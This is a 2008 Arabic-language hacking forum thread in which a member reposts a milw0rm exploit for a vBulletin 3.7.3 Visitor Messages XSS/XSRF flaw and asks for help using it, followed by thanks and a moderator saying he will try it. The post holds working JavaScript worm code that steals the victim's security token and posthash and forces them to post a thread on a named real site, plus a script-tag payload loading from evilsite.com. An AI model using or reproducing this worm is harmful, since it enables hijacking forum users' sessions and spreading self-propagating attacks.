التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-21-2008, 06:53 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية king al-arab
 

 

 
إحصائية العضو





king al-arab غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
king al-arab is on a distinguished road

افتراضي غير مجاب: مطلوب شرح لآستغلآل الثغرهـ لآهنتم لآهل الخبرهـ


كود PHP:
/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF

 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.

 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */

function getNewHttpObject() {
var 
objType false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(
e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(
e) {
objType = new XMLHttpRequest();
}
}
return 
objType;
}

function 
getAXAH(url){

var 
theHttpRequest getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET"url);
theHttpRequest.send(false);

function 
processAXAH(){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

var 
str theHttpRequest.responseText;
var 
secloc str.indexOf('var SECURITYTOKEN = "');
var 
sectok str.substring(21+secloc,secloc+51+21);

var 
posloc str.indexOf('posthash" value="');
var 
postok str.substring(17+posloc,posloc+32+17);

var 
subject 'subject text';
var 
message 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5''subject=' subject '&message=' message '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' sectok '&f=5&do=postthread&posthash=' postok 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function 
postAXAH(urlparams) {
var 
theHttpRequest getNewHttpObject();
               
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST"url);
theHttpRequest.setRequestHeader('*******-Type''application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function 
processAXAHr(elementContainer){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

}
}
}
}


getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
********.
write('<****** src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

# milw0rm.com [2008-11-20] 

المصدر : http://milw0rm.com/exploits/7174


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC l'g,f avp gNsjygNg hgeyviJ gNikjl gNig hgofviJ

التوقيع

لا إلـه إلا الله محمد رسول الله

 

   

رد مع اقتباس
قديم 11-22-2008, 09:56 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.ALsa7eR
 

 

 
إحصائية العضو






Mr.ALsa7eR غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mr.ALsa7eR إرسال رسالة عبر Yahoo إلى Mr.ALsa7eR

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.ALsa7eR is on a distinguished road

افتراضي


تسلم ايدك يا مان

   

رد مع اقتباس
قديم 11-22-2008, 11:26 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
The Final Doom
:: vBspiders Founder ::
 
الصورة الرمزية The Final Doom
 

 

 
إحصائية العضو









The Final Doom غير متواجد حالياً

إرسال رسالة عبر ICQ إلى The Final Doom إرسال رسالة عبر AIM إلى The Final Doom إرسال رسالة عبر MSN إلى The Final Doom إرسال رسالة عبر Yahoo إلى The Final Doom إرسال رسالة عبر Skype إلى The Final Doom

 

 

إحصائية الترشيح

عدد النقاط : 12
The Final Doom is on a distinguished road

افتراضي


اهلا وسهلا ,,

هذه ثغرة جديدة xss بال vb3.7.3

ان شاء الله اشوف واحاول اطبقها

التوقيع




In God, You have to trust

$Contact
Skype:imadgb20
//
\\




 

   

رد مع اقتباس
قديم 11-23-2008, 03:11 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية king al-arab
 

 

 
إحصائية العضو





king al-arab غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
king al-arab is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة The_Do0M_F!N@L
اهلا وسهلا ,,

هذه ثغرة جديدة xss بال vb3.7.3

ان شاء الله اشوف واحاول اطبقها


بآنتظآرك يآ الغآلي...
التوقيع

لا إلـه إلا الله محمد رسول الله

 

   

رد مع اقتباس
قديم 12-04-2008, 10:52 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو





مجهول الهوية غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مجهول الهوية is on a distinguished road

افتراضي


وانا بعد خجول

   

رد مع اقتباس
قديم 12-04-2008, 02:54 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية muistafa
 

 

 
إحصائية العضو





muistafa غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
muistafa is on a distinguished road

افتراضي


واللهوالله

   

رد مع اقتباس
قديم 12-16-2008, 02:19 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
Sho0Ter
:: MaNaGeMeNT ::
 
الصورة الرمزية Sho0Ter
 

 

 
إحصائية العضو








Sho0Ter غير متواجد حالياً

إرسال رسالة عبر ICQ إلى Sho0Ter إرسال رسالة عبر AIM إلى Sho0Ter إرسال رسالة عبر Yahoo إلى Sho0Ter

 

 

إحصائية الترشيح

عدد النقاط : 10
Sho0Ter is on a distinguished road

افتراضي


منتظرينك يا دووم على التجربه

التوقيع

A.K.A >>MANAGEMENT

:a28: :a28:
:41:V@Mp!rES KiNg:41:


COME BACK :d TO LOVELY SITE


GANGS WAR OF HACKIN 4 LIFE

CΘИECƬ: ASK ME

WaИTED

 

   

رد مع اقتباس
قديم 01-02-2009, 06:03 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية H@Jr!_H@Ck
 

 

 
إحصائية العضو








H@Jr!_H@Ck غير متواجد حالياً

إرسال رسالة عبر MSN إلى H@Jr!_H@Ck إرسال رسالة عبر Yahoo إلى H@Jr!_H@Ck إرسال رسالة عبر Skype إلى H@Jr!_H@Ck

 

 

إحصائية الترشيح

عدد النقاط : 10
H@Jr!_H@Ck is on a distinguished road

افتراضي


شكراشكراشكراشكراشكراشكرا

التوقيع




ضحية اجنبية واحدة و لا الف ضحية عربية مسلمة

 

   

رد مع اقتباس
قديم 01-05-2009, 07:45 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Mr-Ha3CkEr
 

 

 
إحصائية العضو





Mr-Ha3CkEr غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mr-Ha3CkEr

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr-Ha3CkEr is on a distinguished road

افتراضي

التوقيع

E-MAIL

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
أقوى آسطوانة عربية آحترآفيـة لآستغلآل جميـع أنوآع الثغرآت 19 نوع ! DannY.IraQi قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 16 07-05-2014 05:25 PM
((بالــصــور))شرح مفصل لأهم ما تحتاج إلى معرفته في الـ Hex J0kEr HaCkEr قســم إختــراق الأجهــزة 1 10-17-2010 02:06 AM
مساعدة و استفسار لأهل الخبرة T!T0 جـــ'ابات العناكــ'ب 3 06-28-2010 01:22 AM
استفساار لأهل الخبر بصفحات المزورة a5xa5x قـسـم الـبـريد الإلـكتروني والحسابات العامة 2 05-05-2010 06:45 PM


الساعة الآن 11:09 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0